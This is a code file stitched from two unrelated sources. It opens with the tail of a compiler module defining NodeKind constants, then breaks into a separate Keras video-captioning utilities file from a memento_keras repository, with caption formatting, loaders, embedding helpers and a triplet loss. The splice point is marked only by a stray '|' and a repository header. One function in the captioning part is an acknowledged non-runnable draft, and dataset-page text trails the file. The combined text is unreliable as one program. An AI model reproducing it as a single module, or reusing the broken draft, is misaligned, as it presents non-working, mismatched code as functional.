NK_INT16_EXPR = NodeKind.INT16_EXPR
NK_INT32_EXPR = NodeKind.INT32_EXPR
NK_INT64_EXPR = NodeKind.INT64_EXPR
NK_UINT8_EXPR = NodeKind.UINT8_EXPR
NK_UINT16_EXPR = NodeKind.UINT16_EXPR
NK_UINT32_EXPR = NodeKind.UINT32_EXPR
NK_UINT64_EXPR = NodeKind.UINT64_EXPR
NK_FLOAT16_EXPR = NodeKind.FLOAT16_EXPR
NK_FLOAT32_EXPR = NodeKind.FLOAT32_EXPR
NK_FLOAT64_EXPR = NodeKind.FLOAT64_EXPR
NK_FLOAT80_EXPR = NodeKind.FLOAT80_EXPR
NK_NULL_EXPR = NodeKind.NULL_EXPR
NK_UNDEFINED_EXPR = NodeKind.UNDEFINED_EXPR
NK_FUNCTION_EXPR = NodeKind.FUNCTION_EXPR
NK_FCALL_EXPR = NodeKind.FCALL_EXPR
NK_VAR_EXPR = NodeKind.VAR_EXPR
NK_CONSTANT_EXPR = NodeKind.CONSTANT_EXPR
NK_ENUMERATION_EXPR = NodeKind.ENUMERATION_EXPR
NK_CONSTEXPR_EXPR = NodeKind.CONSTEXPR_EXPR
NK_PARAM_EXPR = NodeKind.PARAM_EXPR
NK_OPERAND_EXPR = NodeKind.OPERAND_EXPR
NK_UNARY_EXPR = NodeKind.UNARY_EXPR
NK_INC_EXPR = NodeKind.INC_EXPR
NK_DEC_EXPR = NodeKind.DEC_EXPR
NK_BINARY_EXPR = NodeKind.BINARY_EXPR
NK_TERNARY_EXPR = NodeKind.TERNARY_EXPR
NK_LOGIC_EXPR = NodeKind.LOGIC_EXPR
# Correctly spelled public alias for the misspelled enum member.
NK_COMPARISON_EXPR = NodeKind.COMPARISSON_EXPR
NK_EXPR = NodeKind.EXPR
NK_NAME = NodeKind.NAME
NK_FUNCTION_DECL = NodeKind.FUNCTION_DECL
NK_VAR_DECL = NodeKind.VAR_DECL
NK_CONSTANT_DECL = NodeKind.CONSTANT_DECL
NK_ENUMERATION_DECL = NodeKind.ENUMERATION_DECL
NK_PARAM_DECL = NodeKind.PARAM_DECL
NK_ASSIGN_STMT = NodeKind.ASSIGN_STMT
NK_INC_STMT = NodeKind.INC_STMT
NK_DEC_STMT = NodeKind.DEC_STMT
NK_PRINT_STMT = NodeKind.PRINT_STMT
NK_RETURN_STMT = NodeKind.RETURN_STMT
NK_IF_THEN_STMT = NodeKind.IF_THEN_STMT
NK_IF_ELSE_STMT = NodeKind.IF_ELSE_STMT
NK_WHILE_STMT = NodeKind.WHILE_STMT
NK_DO_WHILE_STMT = NodeKind.DO_WHILE_STMT
NK_DO_UNTIL_STMT = NodeKind.DO_UNTIL_STMT
NK_FOR_STMT = NodeKind.FOR_STMT
NK_FOR_IN_STMT = NodeKind.FOR_IN_STMT
NK_FOR_OF_STMT = NodeKind.FOR_OF_STMT
NK_REPEAT_FINITE_STMT = NodeKind.REPEAT_FINITE_STMT
NK_REPEAT_INFINITE_STMT = NodeKind.REPEAT_INFINITE_STMT
NK_BREAK_STMT = NodeKind.BREAK_STMT
NK_CONTINUE_STMT = NodeKind.CONTINUE_STMT
NK_STMT = NodeKind.STMT
NK_BLOCK = NodeKind.BLOCK
NK_MODULE_ASM = NodeKind.MODULE_ASM
NK_SHARED_ASM = NodeKind.SHARED_ASM
NK_MODULE_SCOPE = NodeKind.MODULE_SCOPE
NK_FUNCTION_SCOPE = NodeKind.FUNCTION_SCOPE
NK_CLASS_SCOPE = NodeKind.CLASS_SCOPE
NK_METHOD_SCOPE = NodeKind.METHOD_SCOPE
NK_STATEMENT_SCOPE = NodeKind.STATEMENT_SCOPE
NK_LOOP_SCOPE = NodeKind.LOOP_SCOPE
NK_CASE_SCOPE = NodeKind.CASE_SCOPE
NK_PRIMITIVE_TYPE = NodeKind.PRIMITIVE_TYPE
NK_ENUMERATION_TYPE = NodeKind.ENUMERATION_TYPE
NK_POINTER_TYPE = NodeKind.POINTER_TYPE
NK_ARRAY_TYPE = NodeKind.ARRAY_TYPE
NK_FUNCTION_TYPE = NodeKind.FUNCTION_TYPE
NK_SIGNATURE_TYPE = NodeKind.SIGNATURE_TYPE
NK_INTERFACE_TYPE = NodeKind.INTERFACE_TYPE
NK_STRUCTURE_TYPE = NodeKind.STRUCTURE_TYPE
NK_CLASS_TYPE = NodeKind.CLASS_TYPE
NK_TYPE = NodeKind.TYPE
# Grouping tuples for kind-membership tests, e.g. `kind in NK_LITERALS`.
NK_LITERALS: Tuple[NodeKind, ...] = (
    NK_INT8_EXPR,
    NK_INT16_EXPR,
    NK_INT32_EXPR,
    NK_INT64_EXPR,
    NK_UINT8_EXPR,
    NK_UINT16_EXPR,
    NK_UINT32_EXPR,
    NK_UINT64_EXPR,
    NK_FLOAT16_EXPR,
    NK_FLOAT32_EXPR,
    NK_FLOAT64_EXPR,
    NK_FLOAT80_EXPR
)
NK_SIGNED_EXPR: Tuple[NodeKind, ...] = (
    NK_INT8_EXPR,
    NK_INT16_EXPR,
    NK_INT32_EXPR,
    NK_INT64_EXPR
)
NK_UNSIGNED_EXPR: Tuple[NodeKind, ...] = (
    NK_UINT8_EXPR,
    NK_UINT16_EXPR,
    NK_UINT32_EXPR,
    NK_UINT64_EXPR
)
NK_INTEGER_EXPR: Tuple[NodeKind, ...] = NK_SIGNED_EXPR + NK_UNSIGNED_EXPR
NK_FLOAT_EXPR: Tuple[NodeKind, ...] = (
    NK_FLOAT16_EXPR,
    NK_FLOAT32_EXPR,
    NK_FLOAT64_EXPR,
    NK_FLOAT80_EXPR
)
# Suffix-derived groups; note each includes the generic member itself
# (e.g. NK_TYPE ends with 'TYPE', NK_EXPR ends with 'EXPR').
NK_TYPES: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('TYPE'))
NK_SCOPES: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('SCOPE'))
NK_STATEMENTS: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('STMT'))
NK_EXPRESSIONS: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('EXPR'))
NK_DECLARARIONS: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('DECL'))
# endregion (constants)
# ---------------------------------------------------------
# region FUNCTIONS
# endregion (functions)
# ---------------------------------------------------------
# region CLASSES
# endregion (classes)
# ---------------------------------------------------------
|
<reponame>cfosco/memento_keras<filename>src/captioning_utils.py
import io
import json
import os
import pickle

import numpy as np
import keras
import keras.backend as K

import i3d_config as cfg
from generator import load_vids_opencv, load_hmdb_npy_rgb
def prepare_caption_data(tokenized_captions_json_path, word_embeddings=None,
                         return_backward=False, caption_format='index_list', names_with_slash=True):
    '''
    Prepares tokenized captions from a given json to be fed to a captioning model.

    Inputs
    ------
    tokenized_captions_json_path: string path to the tokenized captions json,
        or an already-loaded dict with the same structure.
    word_embeddings: path to the word embeddings json or a pre-loaded
        embedding dictionary (only needed for the 'embedding_*' formats).
    return_backward: currently unused; kept for interface compatibility.
    caption_format: string that determines the format and type of the
        return variables. Can take the following values:
            'index_triangular_matrix'
            'embedding_triangular_matrix'
            'index_list'
            'embedding_list'
    names_with_slash: when False, "category/file.mp4" keys are flattened to
        "category_file.npy" ('+' replaced by '-') to match on-disk .npy names.

    Returns
    -------
    input_captions: dictionary mapping a video name to the caption input of
    the model. Multiple different arrays can be returned depending on the
    value of caption_format.
    target_captions: dictionary mapping a video name to the desired target
    of the captioning task for that video. Changes depending on the value of
    caption_format.

    Raises
    ------
    ValueError: if caption_format is not one of the supported values.
    '''
    if isinstance(word_embeddings, str):
        word_embeddings = json.load(open(word_embeddings, 'r'))
    if isinstance(tokenized_captions_json_path, str):
        tokenized_captions = json.load(open(tokenized_captions_json_path, 'r'))
    else:
        tokenized_captions = tokenized_captions_json_path
    input_captions = {}
    target_captions = {}
    for vid_name, cap_dict in tokenized_captions.items():
        if not names_with_slash:
            # "category/file.mp4" -> "category_file.npy"; '+' is not allowed
            # in the flattened names, so map it to '-'.
            vid_name = vid_name.split("/")[0].replace("+", "-") + '_' + "".join(vid_name.split("/")[1:])
            vid_name = vid_name[:-4] + ".npy"
        input_captions[vid_name] = []
        target_captions[vid_name] = []
        for i, cap in enumerate(cap_dict['indexed_captions']):
            if caption_format == 'index_triangular_matrix':
                input_captions[vid_name].append(prepare_as_triangular(cap))
                # Target is the input shifted one step left, padded with 0.
                target_captions[vid_name].append(cap[1:] + [0])
            elif caption_format == 'embedding_triangular_matrix':
                input_captions[vid_name].append(prepare_as_triangular(cap, embedding=word_embeddings))
                target_captions[vid_name].append(transform_into_embedding(cap_dict['tokenized_captions'][i], word_embeddings))
            elif caption_format == 'embedding_list':
                input_captions[vid_name].append(transform_into_embedding(cap_dict['tokenized_captions'][i], word_embeddings))
                target_captions[vid_name].append(transform_into_embedding(cap_dict['tokenized_captions'][i], word_embeddings))
            elif caption_format == 'index_list':
                input_captions[vid_name].append(cap)
                target_captions[vid_name].append(cap[1:] + [0])
            else:
                raise ValueError("Unknown caption format %s" % caption_format)
    return input_captions, target_captions
def load_videomem_captions(filepath):
    """Read a videomem caption file into a {video_name: caption} dict.

    Each line is expected to be "<name> <caption>" where the caption's words
    are joined by '-'; dashes are turned back into spaces.
    """
    captions = {}
    with open(filepath, 'r') as handle:
        for line in handle:
            tokens = line.split()
            captions[tokens[0]] = tokens[1].replace('-', ' ')
    return captions
def transform_into_embedding(list_of_words, embedding, offset_by_one=True, max_cap_len=cfg.MAX_CAP_LEN):
    """Map a tokenized caption to a list of embedding vectors.

    When offset_by_one is True the first token (presumably a start token —
    TODO confirm) is skipped. The result is zero-padded so that captions of
    up to max_cap_len tokens all yield lists of the same length.
    """
    # Embedding dimensionality, taken from the first word's vector.
    vector_len = len(embedding[list_of_words[0]])
    start = 1 if offset_by_one else 0
    vectors = [embedding[word] for word in list_of_words[start:]]
    # Zero-pad up to the fixed caption length (no-op if already long enough).
    padding_needed = max_cap_len - len(list_of_words) + start
    vectors += [[0] * vector_len for _ in range(padding_needed)]
    return vectors
def prepare_as_triangular(cap, return_backward=False, embedding=None):
    """Expand one caption into a lower-triangular "teacher forcing" matrix.

    Row r of the returned matrix contains the caption truncated (zeroed) after
    position r, i.e. the partial caption the model sees at step r.

    Parameters
    ----------
    cap: list of token indices, zero-padded.
    return_backward: if True, also compute the reversed-direction matrix
        (currently computed but not returned, matching historical behavior).
    embedding: optional word-embedding dict; when given, indices are first
        converted to embedding vectors.

    Returns
    -------
    np.ndarray: the forward lower-triangular caption matrix.
    """
    # Effective caption length: index of the first padding zero, or
    # MAX_CAP_LEN when the caption fills the whole buffer.
    cap_len = next((i for i, x in enumerate(cap) if x == 0), cfg.MAX_CAP_LEN)
    if embedding is not None:
        cap = transform_into_embedding(cap, embedding, offset_by_one=False)
    # BUG FIX: the original wrapped this in a bare `except` that printed and
    # fell through to a NameError; let any tiling error propagate instead.
    cap_tiled = np.tile(cap, (cap_len - 1, 1))
    # Zero everything above the diagonal for the forward direction.
    cap_matrix_forw = np.tril(cap_tiled)
    if return_backward:
        cap_tiled_bw = np.tile(cap[:cap_len], (cap_len, 1))
        # BUG FIX: ndarray has no .fliplr() method; use np.fliplr().
        # NOTE(review): this value is still not returned, as in the original.
        cap_matrix_backw = np.fliplr(np.triu(cap_tiled_bw))[::-1]
    return cap_matrix_forw
def prepare_one_caption_as_embedding_triangular_matrix():
    # NOTE(review): this function is an unfinished draft and cannot run as
    # written: `cap` and `return_backward` are not defined in this scope, the
    # np.tile call below is missing its reps argument, and np.triu is called
    # with no arguments. It appears to be an abandoned variant of
    # prepare_as_triangular; do not call it.
    cap_len = next((i for i, x in enumerate(cap) if x==0), None)
    cap_tiled = np.tile(cap, (cap_len,1))
    # Diagonalizing for forward direction
    cap_matrix_forw = np.tril(cap_tiled)
    if return_backward:
        # Incomplete: np.tile is missing its second argument.
        cap_tiled_bw = np.tile(cap, )
        # Diagonalizing for backward direction
        # Incomplete: np.triu is missing its argument.
        cap_matrix_backw = np.triu()
    return cap_matrix_forw
def load_videos_and_partial_caption(filenames, path, is_train=False, **kwargs):
    """Load video clips (via OpenCV) plus one partial caption per video.

    Required kwargs: 'idx_cap' (caption index), 'idx_seq' (per-video sequence
    index dict), 'input_captions' (video name -> captions structure).
    """
    caption_idx = kwargs['idx_cap']
    sequence_idx = kwargs['idx_seq']
    all_captions = kwargs['input_captions']
    videos = load_vids_opencv(filenames, path, is_train=is_train)
    partial_caps = [all_captions[name][caption_idx][sequence_idx[name]]
                    for name in filenames]
    return [videos, np.array(partial_caps)]
def load_npy_and_partial_caption(filenames, path, is_train=False, **kwargs):
    """Load precomputed .npy video tensors plus one partial caption per video.

    Required kwargs: 'idx_cap', 'idx_seq', 'input_captions' (see
    load_videos_and_partial_caption for their meaning).
    """
    caption_idx = kwargs['idx_cap']
    sequence_idx = kwargs['idx_seq']
    all_captions = kwargs['input_captions']
    videos = load_hmdb_npy_rgb(filenames, path, is_train=is_train)
    partial_caps = [all_captions[name][caption_idx][sequence_idx[name]]
                    for name in filenames]
    return [videos, np.array(partial_caps)]
def load_npy_and_full_caption(filenames, path, is_train=False, **kwargs):
    """Load precomputed .npy video tensors plus one full caption per video.

    Required kwargs: 'idx_cap' (which caption to take) and 'input_captions'
    (video name -> list of captions).
    """
    caption_idx = kwargs['idx_cap']
    all_captions = kwargs['input_captions']
    videos = load_hmdb_npy_rgb(filenames, path, is_train=is_train)
    full_caps = [all_captions[name][caption_idx] for name in filenames]
    return [videos, np.array(full_caps)]
def load_labels_mem_alpha_words(filenames, str2label_dict, label_array=None, **kwargs):
    """Build [mem, alpha] pairs and one-hot word targets for a batch.

    str2label_dict maps file name -> [mem, alpha, captions]; the target word
    is captions[idx_cap][idx_seq[file]], one-hot encoded over len_vocab.
    """
    caption_idx = kwargs['idx_cap']
    sequence_idx = kwargs['idx_seq']
    vocab_size = kwargs['len_vocab']
    mem_alpha = []
    words = []
    for name in filenames:
        labels = str2label_dict[name]
        mem_alpha.append([labels[0], labels[1]])
        one_hot = np.zeros((vocab_size,))
        one_hot[labels[2][caption_idx][sequence_idx[name]]] = 1
        words.append(one_hot)
    return [mem_alpha, np.array(words)]
def load_labels_mem_alpha_caption(filenames, str2label_dict, label_array=None, **kwargs):
    """Build [mem, alpha] pairs and one-hot-encoded full-sentence targets.

    str2label_dict maps file name -> [mem, alpha, captions]; the whole
    caption at idx_cap is one-hot encoded over len_vocab.
    """
    caption_idx = kwargs['idx_cap']
    vocab_size = kwargs['len_vocab']
    mem_alpha = []
    sentences = []
    for name in filenames:
        labels = str2label_dict[name]
        mem_alpha.append([labels[0], labels[1]])
        sentences.append(keras.utils.to_categorical(labels[2][caption_idx], num_classes=vocab_size))
    return [mem_alpha, sentences]
def load_labels_mem_caption(filenames, str2label_dict, label_array=None, **kwargs):
    """Build memorability labels and one-hot full-sentence targets.

    str2label_dict maps file name -> [mem, captions]; the caption at idx_cap
    is one-hot encoded over len_vocab.
    """
    caption_idx = kwargs['idx_cap']
    vocab_size = kwargs['len_vocab']
    mem = []
    sentences = []
    for name in filenames:
        labels = str2label_dict[name]
        mem.append(labels[0])
        sentences.append(keras.utils.to_categorical(labels[1][caption_idx], num_classes=vocab_size))
    return [mem, sentences]
def load_labels_mot_caption(filenames, str2label_dict, label_array=None, **kwargs):
    """Build Memory-over-Time labels and one-hot full-sentence targets.

    str2label_dict maps file name -> [mot, _, captions]; the caption at
    idx_cap is one-hot encoded over len_vocab.
    """
    caption_idx = kwargs['idx_cap']
    vocab_size = kwargs['len_vocab']
    mot_list = []
    sentences = []
    for name in filenames:
        labels = str2label_dict[name]
        mot_list.append(labels[0])  # Memory over Time curve
        sentences.append(keras.utils.to_categorical(labels[2][caption_idx], num_classes=vocab_size))
    return [mot_list, sentences]
def load_labels_mem_alpha_embedding(filenames, str2label_dict, label_array=None, **kwargs):
    """Build [mem, alpha] pairs and (positive, negative) embedding pairs.

    A single caption index is drawn at random and shared across the batch.
    The negative embedding for each file is taken from the preceding file in
    the batch (the first file uses the last one, via index -1).
    """
    caption_idx = np.random.randint(len(str2label_dict[filenames[0]][2]))
    mem_alpha = []
    sentence_embeddings = []
    for negative_idx, name in enumerate(filenames, start=-1):
        labels = str2label_dict[name]
        mem_alpha.append([labels[0], labels[1]])
        positive = labels[2][caption_idx]
        negative = str2label_dict[filenames[negative_idx]][2][caption_idx]
        sentence_embeddings.append([positive, negative])
    return [mem_alpha, sentence_embeddings]
def create_synched_loading_functions(video_loading_func, input_captions):
    """Build an (input loader, label loader) pair sharing random indices.

    The input loader draws a random caption index and per-video sequence
    indices for each batch; the label loader reuses those same indices so
    inputs and word targets stay aligned.
    """
    # Shared state between the two closures (equivalent to nonlocals).
    shared = {'idx_cap': 0, 'idx_seq': {}}

    def load_func(filenames, path, is_train=False):
        # Draw fresh indices for this batch and remember them for the labels.
        shared['idx_cap'] = np.random.randint(len(input_captions[filenames[0]]))
        shared['idx_seq'] = {
            name: np.random.randint(len(input_captions[name][shared['idx_cap']]))
            for name in filenames
        }
        videos = video_loading_func(filenames, path, is_train=is_train)
        caps = [input_captions[name][shared['idx_cap']][shared['idx_seq'][name]]
                for name in filenames]
        return [videos, np.array(caps)]

    def load_labels_func(filenames, str2label_dict, label_array=None, reset=False):
        mem_alpha = []
        words = []
        for name in filenames:
            labels = str2label_dict[name]
            mem_alpha.append([labels[0], labels[1]])
            words.append(labels[2][shared['idx_cap']][shared['idx_seq'][name]])
        return [mem_alpha, words]

    return load_func, load_labels_func
def create_video_and_caption_loading_function(video_loading_func, caption_inputs):
    '''DEPRECATED'''
    # Counters cycle through captions/sequence positions across calls.
    state = {'cap': 0, 'seq': 0}

    def load_func(filenames, path, is_train=False, reset=False):
        if reset:
            state['cap'] = 0
            state['seq'] = 0
            return
        state['cap'] += 1
        state['seq'] += 1
        # Wrap around once the counters reach the number of captions /
        # caption length of the first file.
        if state['cap'] % len(caption_inputs[filenames[0]]) == 0:
            state['cap'] = 0
        if state['seq'] % len(caption_inputs[filenames[0]][0]) == 0:
            state['seq'] = 0
        videos = video_loading_func(filenames, path, is_train=is_train)
        caps = np.array([caption_inputs[name][state['cap']][state['seq']]
                         for name in filenames])
        return [videos, caps]

    return load_func
def create_video_and_word_label_function(caption_inputs):
    '''DEPRECATED'''
    # Counters cycle through captions/sequence positions across calls.
    state = {'cap': 0, 'seq': 0}

    def load_labels_func(filenames, str2label_dict, label_array=None, reset=False):
        if reset:
            state['cap'] = 0
            state['seq'] = 0
            return
        state['cap'] += 1
        state['seq'] += 1
        # Wrap around based on the first file's caption count / length.
        if state['cap'] % len(str2label_dict[filenames[0]][-1]) == 0:
            state['cap'] = 0
        if state['seq'] % len(caption_inputs[filenames[0]][0]) == 0:
            state['seq'] = 0
        mem_alpha = []
        words = []
        for name in filenames:
            labels = str2label_dict[name]
            mem_alpha.append([labels[0], labels[1]])
            words.append(labels[2][state['cap']][state['seq']])
        return [mem_alpha, words]

    return load_labels_func
def add_caption_to_str2label(str2label, caption_targets):
    """Merge caption targets into label entries.

    Returns a new dict mapping name -> [mem, alpha, caption]; names missing
    from str2label are reported and skipped.
    """
    merged = {}
    for name, caption in caption_targets.items():
        if name not in str2label:
            print(name, "not in str2label")
            continue
        merged[name] = [str2label[name][0], str2label[name][1], caption]
    return merged
def add_sentence_embeddings_to_str2label(str2label, embeddings_dict, average=True):
    """Merge sentence embeddings into label entries.

    Returns name -> [mem, alpha, embeddings]; when average is True the
    per-word vectors under 'embedded' are mean-pooled into a single vector
    (wrapped in a one-element list).
    """
    merged = {}
    for name, entry in embeddings_dict.items():
        if average:
            sentence_emb = [np.mean(entry['embedded'], axis=0)]
        else:
            sentence_emb = entry['embedded']
        merged[name] = [str2label[name][0], str2label[name][1], sentence_emb]
    return merged
def generate_train_val_test_split(original_pickle, missing_vids, clean_vids,
                                  out_path='../../memento_data/memento_train_val_test.json'):
    """Regenerate the train/val/test split json from the legacy pickle split.

    BUG FIX: the original ignored all three parameters and read hard-coded
    paths (one of them via an undefined `labels_path`); it also used `pickle`
    without importing it. The parameters are now actually used.

    Parameters
    ----------
    original_pickle: path to the legacy split pickle; element 0 is the train
        list, element 1 the val list.
    missing_vids: path to the duplicates json (a list of duplicate pairs).
    clean_vids: path to the clean video-set json ("category/file.mp4" names).
    out_path: where the resulting {"train", "val", "test"} json is written.
    """
    with open(original_pickle, 'rb') as f:
        pickle_ca = pickle.load(f)
    # Videos to drop: duplicate pairs plus one known-bad clip.
    removed_vids = json.load(open(missing_vids)) + [['singing/5-5-2-5-8-3-5-2-16655258352_29.mp4']]
    clean_set = json.load(open(clean_vids))

    def _flatten(name):
        # "category/file.mp4" -> "category_file.mp4", with '+' mapped to '-'.
        head = name.split('/')[0].replace('+', '-')
        return head + '_' + ''.join(name.split('/')[1:])

    removed_vids2 = [_flatten(c) for pair in removed_vids for c in pair]

    train_data = [p for p in pickle_ca[0] if p not in removed_vids2]
    val_data = [p for p in pickle_ca[1] if p not in removed_vids2]
    # Test set: every clean video not removed and not already in train/val.
    test_data = []
    for c in clean_set:
        new_c = _flatten(c)
        if new_c not in removed_vids2 and new_c not in train_data and new_c not in val_data:
            test_data.append(new_c)
    print("len(train_data), len(val_data), len(test_data)", len(train_data), len(val_data), len(test_data))
    final_splits = {"train": train_data, "val": val_data, "test": test_data}
    with open(out_path, 'w+') as f:
        json.dump(final_splits, f)
def to_words(caption_index, index_to_token_dict=None, vocab_path=None):
    """Convert a caption index (or nested lists of indices) to word(s).

    Parameters
    ----------
    caption_index: a single index, a list of indices, or a list of lists.
    index_to_token_dict: optional pre-built {index: word} mapping.
    vocab_path: vocab json used when index_to_token_dict is None; defaults
        to cfg._VOCAB_PATH (resolved lazily so the module loads without cfg).

    Returns
    -------
    A word, a list of words, or a list of lists of words, mirroring the
    input's nesting.
    """
    if index_to_token_dict is None:
        if vocab_path is None:
            vocab_path = cfg._VOCAB_PATH
        vocab = json.load(open(vocab_path))
        # Index 0 is reserved for padding; real tokens start at 1.
        idx2word = {i + 1: word for i, word in enumerate(vocab)}
        idx2word[0] = '0'
    else:
        # BUG FIX: the original never assigned idx2word in this branch,
        # raising NameError whenever a mapping was supplied.
        idx2word = index_to_token_dict
    if isinstance(caption_index, (int, float, np.int64)):
        return idx2word[caption_index]
    if isinstance(caption_index, (list, np.ndarray)):
        if isinstance(caption_index[0], (list, np.ndarray)):
            return [[idx2word[c] for c in cap] for cap in caption_index]
        return [idx2word[c] for c in caption_index]
    # Fallback for other iterables (e.g. tuples).
    return [idx2word[c] for c in caption_index]
def get_embedding_matrix(word_embeddings_path, vocab_path):
    """Build a (len(vocab)+1, emb_dim) embedding matrix from json files.

    Row 0 is left as zeros (padding); word i of the vocab occupies row i+1.
    """
    vocab = json.load(open(vocab_path))
    word_embeddings = json.load(open(word_embeddings_path))
    assert len(vocab) == len(word_embeddings)
    word2idx = {word: i + 1 for i, word in enumerate(vocab)}
    embedding_dim = len(next(iter(word_embeddings.values())))
    matrix = np.zeros((len(vocab) + 1, embedding_dim))
    for word, vector in word_embeddings.items():
        matrix[word2idx[word]] = vector
    return matrix
def generate_embedding_json_from_fasttext(tokenizer, fasttext_path, out_path, dummy_magn=0.001, emb_size=300):
    """Generates a json with a dictionary mapping word to embeddings. The embeddings are extracted from fasttext.
    If a word is not found in the embedding, a dummy vector np.ones(emb_size)*dummy_magn is used instead.

    tokenizer: object with a `word_counts` mapping (e.g. a Keras Tokenizer).
    emb_size is only an initial fallback: once a real embedding is seen, its
    length is reused for subsequent dummy vectors so all vectors match.
    """
    data = load_vec_file(fasttext_path)
    vocab_embedding = {}
    c = 0
    for w in tokenizer.word_counts.keys():
        # BUG FIX: narrowed a bare `except` — only a missing word (KeyError)
        # or a malformed vector (ValueError) should trigger the dummy path.
        try:
            emb = np.array([float(t) for t in data[w]])
            emb_size = len(emb)  # keep dummy vectors the same length as real ones
        except (KeyError, ValueError):
            c += 1
            print("Total not in embedding so far:", c, '. Appending dummy embedding vector - np.ones(EMB_SIZE)*(%s)' % dummy_magn)
            emb = np.ones(emb_size) * dummy_magn
        vocab_embedding[w] = list(emb)
    with open(out_path, 'w+') as f:
        json.dump(vocab_embedding, f)
    print("saved vocab embedding")
def load_vec_file(fname):
    """Parse a fasttext .vec file into a {word: [float, ...]} dict.

    The first line is a "<word_count> <dim>" header (read but not otherwise
    used); each following line is "<word> <v1> <v2> ...".

    BUG FIX: the original never closed the file handle; use a context manager.
    """
    data = {}
    with io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore') as fin:
        n, d = map(int, fin.readline().split())  # header: count and dimension
        for line in fin:
            tokens = line.rstrip().split(' ')
            data[tokens[0]] = [float(t) for t in tokens[1:]]
    return data
def spellcheck_captions(captions_input, captions_output=None, save_json=True):
    """Spellcheck videomem captions with autocorrect.

    Parameters
    ----------
    captions_input: path to the raw captions file (see load_videomem_captions).
    captions_output: json path for the corrected captions (required when
        save_json is True).

    Returns
    -------
    dict mapping video name to spellchecked caption.
    BUG FIX: the original returned the raw, un-spellchecked captions.
    """
    videomem_captions = load_videomem_captions(captions_input)
    from autocorrect import Speller  # third-party; imported lazily on purpose
    spell = Speller(lang='en')
    videomem_captions_spellchecked = {name: spell(cap)
                                      for name, cap in videomem_captions.items()}
    if save_json:
        json.dump(videomem_captions_spellchecked, open(captions_output, "w+"))
    return videomem_captions_spellchecked
def triplet_loss(y_true, y_pred):
    """Margin-based triplet loss on sentence embeddings.

    y_true[:, 0] holds the positive embedding, y_true[:, 1] the negative;
    y_pred is the predicted embedding. The negative distance is weighted by
    0.5 and a fixed margin of 1 is applied.
    """
    margin = K.constant(1)
    positive_dist = K.sum(K.square(y_pred - y_true[:, 0]), axis=-1)
    negative_dist = K.sum(K.square(y_pred - y_true[:, 1]), axis=-1)
    return K.mean(K.maximum(K.constant(0), positive_dist - 0.5 * negative_dist + margin))
def reset_generator_state(gens):
    """Reset the caption/sequence counters of each generator's loader closures."""
    for generator in gens:
        generator.load_func(reset=True)
        generator.load_label_func(reset=True)
def show_results():
    """Placeholder: result visualization is not implemented yet."""
    pass
# NOTE: the following lines were stray dataset-page text accidentally appended
# to the file; commented out to keep the module importable.
# Subsets and Splits
# No community queries yet
# The top public SQL queries from the community will appear here once available.